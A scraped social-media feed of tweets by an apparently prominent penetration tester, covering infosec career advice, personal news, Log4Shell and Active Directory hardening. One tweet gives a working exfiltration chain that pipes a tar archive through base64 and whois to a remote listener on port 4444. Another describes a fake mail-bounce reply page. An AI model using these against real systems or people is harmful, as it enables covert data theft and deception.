Dad / Husband / Marine / Student / Teacher / @Hak5 / @NoVAHackers / @SiliconHBO / @NationalCCDC / @MARFORCYBER Auxiliary

The Internet
If you have ever learned anything from me at all. I challenge you to pay it forward. I didn’t get to where I am by standing on the shoulders of giants, I got here by learning tidbits from hundreds of tweeters, bloggers, podcasters & presenters who chose to share their knowledge.
43
185
1,064
"I'm sorry to bother you, but your CPU is hotter than the surface of the sun. This may shorten your CPU's lifespan if this continues -- Windows 10" - (source: teddit.net/r/Windows10/comme…)
34
784
2,069
Diagrams for the #Log4j #Log4Shell that can help people discuss things. Hope this helps...
22
696
2,009
Thanks to @dildog for the idea. Very happy with my new keychain ;)
94
261
1,663
Dear %Companies%, A single security minded Sys Admin is worth more than a handful of pentesters. Please start investing in the admins you already have. I say this as a pentester who has seen the impact that an empowered admin can have.
39
667
1,633
I want to make something very clear to the #infosec community. Just because you aren't deeply technical, a pentester, a red teamer, a forensics expert, or RE wiz doesn't mean that you can't teach people things. Everyone's life experiences are different and the more we 1/4
35
396
1,516
First: ncat -k -l -p 4444 | tee files.b64 (tee to a file so you can make sure you have it) Next: tar czf - /bin/* | base64 | xargs -I bits timeout 0.03 whois -h 192.168.80.107 -p 4444 bits Finally: cat files.b64 | tr -d '\r\n' | base64 -d | tar zxv (to get the files out)
10
484
1,350
Just watched the lady in front of me at the DMV give a USB stick to the clerk and say that all of her proofs of ID were “digital”. The clerk proceeded to plug in the USB and copy the files to his desktop, then open them. 1st) I’m curious if she is in the job market. 2nd)
69
261
1,206
My kids and their friends are having a LAN party and they think I’m totally weird for calling it that... but they are all playing the same game, on their own computers, in the same room in which most do not live. == LAN party yes?
99
100
1,146
I’m done.
126
19
1,072
Today I joined the @BHinfoSecurity security team! Super excited to join this League of Extraordinary Hackers. Thanks to everyone who reached out and sent DMs about positions.
143
42
1,074
My father passed away due to Covid related complications. I’m home from emergency leave. I’m done with this conversation.

ALT Sad Face GIF

408
21
1,011
Hey @defcon - what about T-shirts or Hoodies with these QR codes on them. One says "DO NOT TAKE PHOTOS AT DEF CON" the other says "I DO NOT CONSENT TO THIS PHOTO OR VIDEO". Which due to the camera apps auto reading QR codes should pop up this message if you happen to be in-frame.
39
174
982
Just tried this out and it works! Next time you get a vendor email, reply with this: malicious.link/nosuchuser.ht… (code here: gist.github.com/mubix/43ea0c…) with a subject line of "Mail Delivery Subsystem - Address Not Found" (make sure to clear out the "RE:" and other subject line :)
13
266
928
ATM card PIN code bypass - request for CVE ;) (my kids first 0day)
25
251
873
LetMeOutOfYour.Net is back online. It's an egress testing tool that you can hit via UDP, HTTP, HTTPS, or SSH on any port via IPv6 or IPv4 and you will always get back `w00tw00t` for verifiable responses.
14
371
849
10 #Log4Shell Facts vs Fiction: a 🧵 1. 1.x is NOT vuln to this RCE. While it doesn't have another RCE, it requires access to send serialized data to a listener ON the log server. This is much MUCH harder to exploit and kind of rare for a Log4j server to be running.
12
300
857
One of my favorite interview questions is asking someone what they believe the top 10 security issues companies have today. You will know exactly how much experience, forethought, maturity, and technical skill someone has just from that one question.
56
90
811
I use Log4shell canaries in my passwords and I have one per website. It’s been crazy interesting the sites that I have gotten pings for and where the pings are from. I think it’s cool. It would be a fun talk to put together and a good story to tell but not useful…
34
57
807
67,139
To all looking into the SolarWinds Orion breach: Orion holds credentials, such as Domain Admin, Cisco/Router/SW root/enable creds, ESXi/vCenter Credentials, AWS/Azure/Cloud root API keys. and so much more. CONSIDER THESE CREDENTIALS COMPROMISED if you see other IOCs #SunBurst

ALT warning about Sunburst compromise spanning more than just infection

22
290
713
Today was my last day of work at Cruise :( . I’m part of a lay-off :/ So yah... looking for work. I know the US is at a crazy unemployment rate and probably very few are hiring but if you know of anywhere looking to add to their internal red team, security trainer, SMB CTO/CISO/

ALT nicksplat job search GIF

119
500
664
If you run a CTF and one of your challenges is a zoomed out fuzzy picture of 4000 lines of Base64 in the Wing Dings font, you are a monster and should feel bad about yourself.
30
105
671
Your biggest obstacle in this world is yourself. Self doubt is beaten by ignoring it. It’s dumb and useless. You are amazing and can do anything you let yourself achieve. I believe in you.
18
189
677
#infosec career advice. If all you ever do is fight fires all day, the best you can ever hope to learn is to be more efficient at fighting fires. You will never learn new ways to fight fires. Always schedule time for yourself during your day to just learn. #alwaysbelearning
17
130
634
This is my dad at my graduation in 2019. I spent a lifetime trying to make him proud enough.
36
8
602
The biggest career advice I can give anyone in Infosec is to document/brag about your successes. I feel safe in saying that any manager I have had would vouch for the fact that you have to usually pry it out of me. Which isn’t humble, it’s stupid. [1/2]
29
75
609
Learned something new today. If you decrease the WiFi power so it doesn’t extend as far, magically your kids come out of their rooms in search of better signal...
18
78
620
Posted my "Practical Cryptography for Infosec Noobs" slides for @shmoocon 2022 here: linkedin.com/posts/mubix_shm… I know I went fast so here are all of the slides so that you can get each of the links and details.
6
120
614
Broadcom CEO telling VMware folks to return to the offices “or else” is not gonna end well. If you are a VMware shop, are y’all worried at all or just expecting to roll through?
62
65
608
152,302
Watching password cracking tools work:
7
333
582
#UnpopularOpinion I don't believe that anyone's first career should be pentester or red teamer. Ethics, maturity, empathy and technical practice are all things I feel are base requirements for the job and aren't things you can have in your first few years of working in IT/Sec
42
67
561
Hi. I’m hiring for my team. 3 spots open, not all of the requirements are requirements. Flexible on the Senior part too. What I’m looking for is the stuff I can’t teach. Drive, empathy, and the ability to learn quickly and dig deep. careers.united.com/job/13330…

ALT orange hiring GIF by Sixt

62
243
559
It’s easy to poke fun, but we were all there at one point, albeit swapping Kali for BackTrack or Auditor or Nmap even…
39
48
545
I feel that I am better at red teaming because I was a SOC Analyst, I was tech support, I was help desk, I was a sys admin. More than any college degree or certification, or technical knowledge I have, empathy and knowing how things work has made me a better tester.
20
47
544
This is my friendly reminder that you are not alone and you are awesome. If you can see this then you have my permission to contact me to talk about whatever you need to, whenever you need to.
24
78
540
If you haven't yet, as soon as possible run the following command on ALL of your AD CAs: certutil.exe -setreg CA\AuditFilter 127 This will enable all of the logging you will need to catch many of the attacks detailed in @harmj0y @tifkin_ 's awesome work
6
180
549
If you have LDAP servers inside your network, or trust external 3rd-party ones, and either of them allow the schema attributes javaClassName, javaCodeBase or javaSerializedObject as writable, you should be making sure attackers aren't using them for #Log4j #Log4Shell
5
179
540
Finally decided to post 10+ years worth of notes on using ldapsearch - it references great work from @ropnop @agsolino @harmj0y and @YuG0rd malicious.link/post/2022/lda…
10
215
550
A home lab is not a requirement to getting a job in Infosec. Spending money on something like that is an investment in you learning technical skills, but so is a cloud account with free credits and @hackthebox_eu and @tryhackme and a hundred different resources. 1/2
10
102
516
I really want to send this to every client that ever put “allowed testing hours” requirements on a pen test / red team assessment
*checks watch* *pulls off ski mask* "Shit."
16
125
509
Ladies and Gents, my life goal is to graduate from @wgu by the end of this year. To do that I’m going on hiatus. No games, or social media. No streams or TV shows. The next post you see from me should only be two words. “I’m done”. See you soon.
64
10
489
One of the smallest changes with huge effect you can make to Active Directory to help secure it against a LOT of attack paths is changing the attribute ms-DS-MachineAccountQuota = 0. Do this now, do it on Monday, but adds a pretty decent barrier to many attack paths.

ALT Now GIF

8
126
477
Nerd Psychopathy Test: (what do you enter into the following dialog box?)
314
37
469
141,918
Please make sure to patch your Windows systems. CVE-2020-16938 is no joke. Hard Drive encryption does break this attack, however, most servers and virtual machines don't have HDD encryption enabled. Patch! #ntdsdit op: @jonasLyk
5
221
479
3 OSCP Vouchers up for grabs. Here is how to get them: gist.github.com/mubix/f14e36… cc: @nickadam @aerundel @cyanide_m @DissectMalware @SuperNerdDace @ericazeli @Ch33r10 @theRealFr13nd @bobthehackr @NecoleStephen @rana__khalil @FelixAtter @ShadowBroker218 @danakdev @JoshGatka (Plz RT)
36
352
479
80% of pentest firms/redteams that I've been a part of don't have operational documentation even close to what was posted of the google translated Conti playbook. I'm part of that problem so lets all #DoBetter #BeBetter #DocumentBetter
10
77
453
When the Red Team gets sent phishing emails by the Security Awareness team...

ALT Frozen Game On GIF

15
59
442
Releasing a NFS Client today, it's written in Go, has file list, upload, download, delete, make directory and delete directory functions without having to mount the drive or permissions (locally) to do so. This can be super helpful from a Win host. github.com/mubix/nfsclient
12
131
445
64,814
This is awesome!
Windows security log quick reference for SOC Analysts #CyberSecurity
4
108
443
This is year 2 of holidays during a pandemic. My DMs are open and I am here if you just want to talk to someone and not feel alone. I am here if you need to scream and yell and tell someone that it hurts. I am here. You are not alone.
23
44
407
to be a hacker. My call to action is this; I would like to see more people submitting talks. Screw what CFP boards think of your talk. They make decisions based on what they want their conference to be, not how good your talk is. You are amazing & I want to hear every word. #Love
13
37
431
Thanks for all the support, I will respond to messages. I had a 48 hour exam this weekend so I disconnected, focused on family, the exam and getting my head right. On a positive note; I passed the Red Team Operator exam! by @zeropointsecltd @_RastaMouse badgr.com/public/assertions/…
25
21
432
Post-Pentest Depression is where you start doubting all of the things you did and slapping your self for all the mistakes you made, or things you forgot to check. Am I alone in this or anyone else get this?
51
54
418
Coolest birthday cake ever!
47
11
405
Friendly reminder to not copy and paste random strings into a shell from the Internet and especially Twitter and ESPECIALLY on to production servers to “search for vulnerable Log4j”
9
60
387
You know you're getting old when you google for a technique that you want to do on a test and the top result is your own blog... #LosingMyMind
21
58
407
If you pentest, red team or defend windows environments, this should be required reading. Wish I was in the room when this talk was presented. Please @hackinparis release this video ASAP. :)
Just uploaded the pdf slides of my talk "whoami /priv" @hackinparis #HIP19 github.com/decoder-it/whoami…
6
130
409
#IncidentResponse challenge: Here is a spam email that made it through Google's spam filter. Which of the headers are actually real and which ones are fake? Can you spot the cool trick that this spammer is using?
24
77
398
What is your favorite InfoSec related discord server? (*Invite links or website links are welcome)
34
59
390
I can't tell you how much time this has saved me since I set this up. Thanks again @dildog
Thanks to @dildog for the idea. Very happy with my new keychain ;)
23
25
377
Cool powershell trick I learned today: " gci C:\users\*\* " lets you know which user's home directories you have access to and whats in the first level.
5
70
367
Hacking has officially jumped the shark…
23
31
334
Advanced Red Team EDR evasion technique: 1. Don’t run your malware on a box that is monitored by EDR. 2. Tunnel all of your other attacks through the box without EDR 3. Gain access to everything via weak IAM controls (Active Directory) 4. End engagement Did I miss anything?
17
59
352
Dear Pentesters, don't be lazy/sloppy and leave files, registry keys, cron jobs everywhere. Do your best to clean up everything you put down. #ZeroContextTweets
15
104
360
#DEFCON26 #BlackHat2018 #BSidesLV advice: just because they are on stage or in front of the class doesn’t mean they know what they are talking about. Challenge everything, test it yourself. This however doesn’t give you the right to treat anyone as less than respectful. They 1/n
10
80
348
Executive order #Metasploit - #Meterpreter
6
195
318
Anyone know a good way to help a neurotypical person understand executive disfunction? Just saying “it’s like you want to do something but you can’t” isn’t really landing.
63
24
306
83,304
To all. If you ever find yourself in a situation at a conference or place I’m at and need me to call you or pick you out of that situation. DM me for phone number so that you have it and can use it in that situation. I will show up.
19
25
308
To all of you working on #log4j today, a Friday, you are appreciated. You are awesome. Thank you for doing the work that needs to get done when it counts. Security is often a thankless job. So thank you for today.

ALT Ufc 205 Thank You GIF by UFC

8
55
315
Played a bit with @CertSG 's FIR project (Fast Incident Response). Took me about 40 minutes to get set up and it's a fully functional Incident Response tracking platform w/ metrics! + right price: FREE ;-) github.com/certsocietegenera…
8
116
320
This is a blog post that ALL pentesters/red teamers should save in their favorite offline knowledge base (evernote, keep, wiki, etc). Do it now, future you will thank me.. or more correctly Damien King (the author). Seniors: go stuff this down your junior tester's throats ASAP nitter.app/CTXIS/status/920616726…
6
155
305
Today a student of mine couldn’t find the desktop of a user on the Windows XP box he exploited because it didn’t have a C:\Users directory. I felt sooooo old…

ALT Titanic Old Lady GIF

21
23
309
I have grown to love TMUX but it's ability to log console output is atrocious vs SCREEN. Here are my two setup guides for myself. Screen logs ALL sessions automatically, and even through the PIA setup for TMUX you still have to enable it every single time....
16
88
320
Please randomize your root password on OSX! You don't need it. (cc @SteveD3): cat /dev/urandom | env LC_CTYPE=C tr -dc a-zA-Z0-9 | head -c 60; echo | xargs -I rootpw sudo dscl . -passwd /Users/root rootpw
11
181
294
I wish certifications didn't have arbitrary expiration dates, but instead had big, bold "issued on" dates. That way certification companies couldn't milk you for "CPE"s (which for some reason you can "pay" for..) & hiring companies could see when you had that knowledge. Thoughts?
47
35
297
If I was in charge of an entire company’s security this first large projects I would focus on is (in no particular order) - asset management (can you tell me what this IP on your network is and does within 10 minutes)
13
88
282
This tweet didn't age well. It was short sighted. For me, since people's decision to not get vaccinated has resulted in my father being hospitalized and my son possibly infected too... Go get the shot or stay home. Stop hurting other people. I'm tired. :(
I'm vaccinated. I think it's a good idea to do so and hope that others also get vaccinated. Obviously you can do what you wish, but whatever your decision is, I hope that you stay healthy and live a long life doing whatever you love doing for as long as possible.

ALT I Love You Hug GIF by RainToMe

26
28
265
Dear CTF challenge creators. If I have to guess a password, URL, hostname etc and it’s not either in rockyou, dirbuster or other standard word list, you should confirm that it’s in fact guessable in a short period of time by having a friend attempt it.
23
49
289
If you are on a Blue Team, or IT Team, and you aren't running BloodHound REGULARLY, you are doing yourself a disservice. As a CTO I would either get rid of AD, or have BloodHound statistics be a top KPI/OKR for my org.

ALT Make It So Star Trek GIF

13
61
289
I've released a tool that can help you audit the exposure the SolarWinds Orion box poses to the rest of your network. The code is open source: malicious.link/post/2020/sol…
4
125
268
Pentesters / Red Teamers - What is in your virtual EDC (every-day-carry) backpack of tools? What's your most commonly used Github/Gitlab repositories?

ALT Carrying Backpack GIF

11
59
286
Wanted to share that I just finished my MBA. Two graduate degrees, my undergrad and a CISSP. Now all I have to do is start attending RSA… ;)
57
4
295
9,285
ATM repair guy at my local gas station fixed the machine wirelessly. It even unlocked with a button on his tablet.
7
124
262
Boom! I’m a 81% (passed is all that really matters) new Encryption Specialist. I can help you with all your ROT13 needs ;)
27
17
268
Would you like to be a Certified Checkbox Unchecker as well? Now it's easy to get your CCU certification, sign up here: certifiedcheckboxunchecker.c… - It's the same esteemed certification body I received mine from: (Takes about an hour to process)
21
82
270
I never realized how strong the rainbow had become as a symbol. ‘been wearing a rainbow 🌈 mask around recently in public & it’s been a small glimpse into the hate/disgust thrown at 🏳️‍⚧️ LGBTQ+ peeps. I now need LOTS more rainbow gear. I’m all about making bigots uncomfortable :)
12
11
266
Anyone need to upgrade their internet speeds? I don’t need it anymore.
34
3
260
haven't seen or done personally. There is a lot of bravado out there. Many people speak on popping shells & APT like they are experts, that aren't, but when you share experience, real experience, we all get better. Shared knowledge, infinite curiosity, this is what it means 3/4
1
19
263
IT levels based on job requirements:
13
37
257
Public Service Announcement: Excel is NOT a good password manager.

ALT Facepalm

39
60
254
If you are in pentesting or red teaming and you haven't seen the movie Sneakers, what are you even doing with your life? :P
1992: The movie "Sneakers" was released. With a budget of $35 million, it grossed $105 million at the box office. A hacker classic! Bishop, Whistler, Cosmo, and Mother!
20
48
262
26,929
So this just happened....
10
56
251
*IT* *IS* *NOT* *”USERS”* *JOB* *TO* *KNOW* *SECURITY* *BEST* *PRACTICES*… we all need to do better at earning our paychecks and make it so they can do their job’s securely (the ones they are paid to do) without having to think about it. #TheHillIllDieOn
16
44
248
28,622